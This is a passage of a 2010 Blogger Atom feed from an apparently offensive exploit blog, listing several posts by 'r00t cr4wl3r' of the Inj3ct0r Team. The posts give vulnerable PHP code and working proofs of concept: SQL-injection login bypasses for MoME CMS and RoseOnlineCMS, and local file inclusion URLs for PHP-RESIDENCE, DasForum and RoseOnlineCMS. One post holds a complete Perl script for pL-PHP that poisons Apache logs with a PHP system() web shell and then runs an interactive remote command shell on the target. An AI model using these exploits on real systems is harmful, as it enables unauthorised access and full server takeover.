rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7038350200048825854'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/al3jeb-script-remote-login-bypass.html' title='al3jeb script Remote Login Bypass Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-8339200418716191578</id><published>2010-03-04T10:13:00.001-08:00</published><updated>2010-03-04T10:13:46.524-08:00</updated><title type='text'>MoME CMS &lt;= 0.8.5 Remote Login Bypass Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[!] Code :&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;//controllo user e passwd da login&lt;br /&gt; if(isset($_POST['posted_username']) &amp;&amp; isset($_POST['posted_password'])) {&lt;br /&gt;        $query="SELECT * FROM users WHERE username='$_POST[posted_username]' AND&lt;br /&gt;password=md5('$_POST[posted_password]')";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;[!] PoC:&lt;br /&gt; &lt;br /&gt;    username : ' or '1=1&lt;br /&gt;    password : cr4wl3r&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8339200418716191578?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/8339200418716191578/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/mome-cms-085-remote-login-bypass.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8339200418716191578'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8339200418716191578'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/mome-cms-085-remote-login-bypass.html' title='MoME CMS &lt;= 0.8.5 Remote Login Bypass Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-47790272847150941</id><published>2010-03-04T10:12:00.002-08:00</published><updated>2010-03-04T10:13:19.096-08:00</updated><title type='text'>PHP-RESIDENCE &lt;= 0.7.2 Multiple LFI Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[!] Code :&lt;br /&gt; &lt;br /&gt;    include("./includes/templates/$template_data_dir/phrases.php");&lt;br /&gt; &lt;br /&gt;[!] PoC:&lt;br /&gt; &lt;br /&gt;    [PHP-RESIDENCE_path]/includes/templates/cal/form.php?template_data_dir=[LFI]&lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;br /&gt;[!] Code :&lt;br /&gt; &lt;br /&gt;    include("./includes/templates/$template_data_dir/phrases.php");&lt;br /&gt; &lt;br /&gt;[!] PoC:&lt;br /&gt; &lt;br /&gt;    [PHP-RESIDENCE_path]/includes/templates/rat/form.php?template_data_dir=[LFI]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-47790272847150941?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/47790272847150941/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/php-residence-072-multiple-lfi.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/47790272847150941'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/47790272847150941'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/php-residence-072-multiple-lfi.html' title='PHP-RESIDENCE &lt;= 0.7.2 Multiple LFI Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-7569590113131887665</id><published>2010-03-04T10:12:00.001-08:00</published><updated>2010-03-04T10:12:51.632-08:00</updated><title type='text'>RoseOnlineCMS &lt;= 3 B1 Remote Login Bypass Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if(isset($_POST['submit'])) {&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;// username and password sent from signup form&lt;br /&gt;$USER = $_POST['user'];&lt;br /&gt;$PASS = md5($_POST['pass']);&lt;br /&gt; &lt;br /&gt;$sql = "SELECT * FROM `accounts` WHERE username='$USER' and password='$PASS' and accesslevel = '300'";&lt;br /&gt;$result = mysql_query($sql);&lt;br /&gt; &lt;br /&gt;// Mysql_num_row is counting table row&lt;br /&gt;$count = mysql_num_rows($result);&lt;br /&gt;// If result matched $myusername and $mypassword, table row must be 1 row&lt;br /&gt; &lt;br /&gt;if($count == 1){&lt;br /&gt;// Register $user, $pass and redirect to file ?op=admin&lt;br /&gt;session_register("USER");&lt;br /&gt;session_register("PASS");&lt;br /&gt;echo('Logged in: &lt;a href=?op=admincp&gt;Click here&lt;/a&gt; to go to the control panel.');&lt;br /&gt;}&lt;br /&gt;else {&lt;br /&gt;echo "You are banned, or you are an user with no permission to enter.";&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;[!] PoC: [RoseOnlineCMS_path]/modules/admin.php&lt;br /&gt; &lt;br /&gt;    username : ' or '1=1&lt;br /&gt;    password : cr4wl3r&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7569590113131887665?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/7569590113131887665/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/roseonlinecms-3-b1-remote-login-bypass.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7569590113131887665'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7569590113131887665'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/roseonlinecms-3-b1-remote-login-bypass.html' title='RoseOnlineCMS &lt;= 3 B1 Remote Login Bypass Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-3056724167444356881</id><published>2010-03-04T10:11:00.002-08:00</published><updated>2010-03-04T10:12:03.771-08:00</updated><title type='text'>DasForum (layout) Local File Inclusion Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[!] Vulnerability Code [bbcode_inputs.php] :&lt;br /&gt; &lt;br /&gt;    include("layouts/".$layout."/bbcode_inputs.php");&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;[!] PoC:&lt;br /&gt; &lt;br /&gt;    [DasForum_path]/bbcode_inputs.php?layout=[LFI]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3056724167444356881?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/3056724167444356881/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/dasforum-layout-local-file-inclusion.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3056724167444356881'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3056724167444356881'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/dasforum-layout-local-file-inclusion.html' title='DasForum (layout) Local File Inclusion Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-8640076197210909979</id><published>2010-03-04T10:11:00.001-08:00</published><updated>2010-03-04T10:11:39.168-08:00</updated><title type='text'>pL-PHP &lt;= beta 0.9 Local File Include Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#pL-PHP &lt;= beta 0.9 Local File Include Exploit&lt;br /&gt;#Discovered by cr4wl3r&lt;br /&gt;#Contact : cr4wl3r[!]linuxmail.org&lt;br /&gt;use IO::Socket;&lt;br /&gt;use LWP::Simple;&lt;br /&gt;@apache=(&lt;br /&gt;"../apache/logs/error.log",&lt;br /&gt;"../apache/logs/access.log",&lt;br /&gt;"../../apache/logs/error.log",&lt;br /&gt;"../../apache/logs/access.log",&lt;br /&gt;"../../../apache/logs/error.log",&lt;br /&gt;"../../../apache/logs/access.log",&lt;br /&gt;"../../../../../../../etc/httpd/logs/acces_log",&lt;br /&gt;"../../../../../../../etc/httpd/logs/acces.log",&lt;br /&gt;"../../../../../../../etc/httpd/logs/error_log",&lt;br /&gt;"../../../../../../../etc/httpd/logs/error.log",&lt;br /&gt;"../../../../../../../var/www/logs/access_log",&lt;br /&gt;"../../../../../../../var/www/logs/access.log",&lt;br /&gt;"../../../../../../../usr/local/apache/logs/access_log",&lt;br /&gt;"../../../../../../../usr/local/apache/logs/access.log",&lt;br /&gt;"../../../../../../../var/log/apache/access_log",&lt;br /&gt;"../../../../../../../var/log/apache2/access_log",&lt;br /&gt;"../../../../../../../var/log/apache/access.log",&lt;br /&gt;"../../../../../../../var/log/apache2/access.log",&lt;br /&gt;"../../../../../../../var/log/access_log",&lt;br /&gt;"../../../../../../../var/log/access.log",&lt;br /&gt;"../../../../../../../var/www/logs/error_log",&lt;br /&gt;"../../../../../../../var/www/logs/error.log",&lt;br /&gt;"../../../../../../../usr/local/apache/logs/error_log",&lt;br /&gt;"../../../../../../../usr/local/apache/logs/error.log",&lt;br /&gt;"../../../../../../../var/log/apache/error_log",&lt;br /&gt;"../../../../../../../var/log/apache2/error_log",&lt;br /&gt;"../../../../../../../var/log/apache/error.log",&lt;br /&gt;"../../../../../../../var/log/apache2/error.log",&lt;br /&gt;"../../../../../../../var/log/error_log",&lt;br /&gt;"../../../../../../../var/log/error.log"&lt;br /&gt; &lt;br /&gt;);&lt;br /&gt;if (@ARGV &lt; 3){&lt;br /&gt;print "&lt;br /&gt;========================================================================&lt;br /&gt;|                 pL-PHP &lt;= beta 0.9 Local File Include Exploit&lt;br /&gt;|               Usage: gorontalo.pl [target] [path] [apachepath]&lt;br /&gt;|           Example: gorontalo.pl target.com /pages/ ../logs/error.log&lt;br /&gt;|                            coded by : cr4wl3r&lt;br /&gt;========================================================================&lt;br /&gt;";&lt;br /&gt;exit();&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt;$host=$ARGV[0];&lt;br /&gt;$path=$ARGV[1];&lt;br /&gt;$apachepath=$ARGV[2];&lt;br /&gt; &lt;br /&gt;print "Injecting code in log files...\n";&lt;br /&gt;$CODE="&lt;?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?&gt;";&lt;br /&gt;$socket = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerAddr=&gt;"$host", PeerPort=&gt;"80") or die "Connect Failed.\n\n";&lt;br /&gt;print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";&lt;br /&gt;print $socket "User-Agent: ".$CODE."\r\n";&lt;br /&gt;print $socket "Host: ".$host."\r\n";&lt;br /&gt;print $socket "Connection: close\r\n\r\n";&lt;br /&gt;close($socket);&lt;br /&gt;print "Write END to exit!\n";&lt;br /&gt;print "IF not working try another apache path\n\n";&lt;br /&gt; &lt;br /&gt;print "[shell] ";$cmd = &lt;STDIN&gt;;&lt;br /&gt; &lt;br /&gt;while($cmd !~ "END") {&lt;br /&gt;    $socket = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerAddr=&gt;"$host", PeerPort=&gt;"80") or die "Connect Failed.\n\n";&lt;br /&gt;    print $socket "GET ".$path."/modules/pages/index.php?id=".$apache[$apachepath]."&amp;cmd=$cmd HTTP/1.1\r\n";&lt;br /&gt;    print $socket "Host: ".$host."\r\n";&lt;br /&gt;    print $socket "Accept: */*\r\n";&lt;br /&gt;    print $socket "Connection: close\r\n\n";&lt;br /&gt; &lt;br /&gt;    while ($raspuns = &lt;$socket&gt;)&lt;br /&gt;    {&lt;br /&gt;        print $raspuns;&lt;br /&gt;    }&lt;br /&gt; &lt;br /&gt;    print "[shell] ";&lt;br /&gt;    $cmd = &lt;STDIN&gt;;&lt;br /&gt;}&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8640076197210909979?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/8640076197210909979/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/pl-php-beta-09-local-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8640076197210909979'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8640076197210909979'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/pl-php-beta-09-local-file-include.html' title='pL-PHP &lt;= beta 0.9 Local File Include Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-6967213291806103828</id><published>2010-03-04T10:10:00.000-08:00</published><updated>2010-03-04T10:11:06.914-08:00</updated><title type='text'>RoseOnlineCMS &lt;= 3 B1 (admin) Local File Inclusion</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;[!] Code :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if (isset($_GET['write'])) {&lt;br /&gt;   $argv = explode('-',$_GET['write']);&lt;br /&gt;   settype($argv,'array');&lt;br /&gt;   $_GET['admin'] = @$argv[0];&lt;br /&gt;   $_GET['url'] = @$argv[1];&lt;br /&gt;   $_GET['do'] = @$argv[2];&lt;br /&gt;   $_GET['key'] = @$argv[3];&lt;br /&gt;}&lt;br /&gt;$admin = !isset($_GET['admin']) ? index : $_GET['admin'] ;&lt;br /&gt;&lt;br /&gt;  if (is_file("modules/admin/".$admin.".php")) {&lt;br /&gt;       include("modules/admin/".$admin.".php");&lt;br /&gt;   &lt;br /&gt;  } else {&lt;br /&gt;       echo('Administrator page not found.&lt;br /&gt;                   &lt;br /&gt;&lt;br /&gt; &lt;a href="index.php"&gt;Click here to go back home&lt;/a&gt;');&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;ob_end_flush();&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[!] PoC:&lt;br /&gt;&lt;br /&gt;   [RoseOnlineCMS_path]/modules/admincp.php?admin=[LFI]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6967213291806103828?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/6967213291806103828/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/roseonlinecms-3-b1-admin-local-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6967213291806103828'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6967213291806103828'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/roseonlinecms-3-b1-admin-local-file.html' title='RoseOnlineCMS &lt;= 3 B1 (admin) Local File Inclusion'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-700203407911835660</id><published>2010-03-04T10:09:00.003-08:00</published><updated>2010-03-04T10:09:59.523-08:00</updated><title type='text'>SaurusCMS &lt;= 4.6.4 Multiple RFI Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;~ 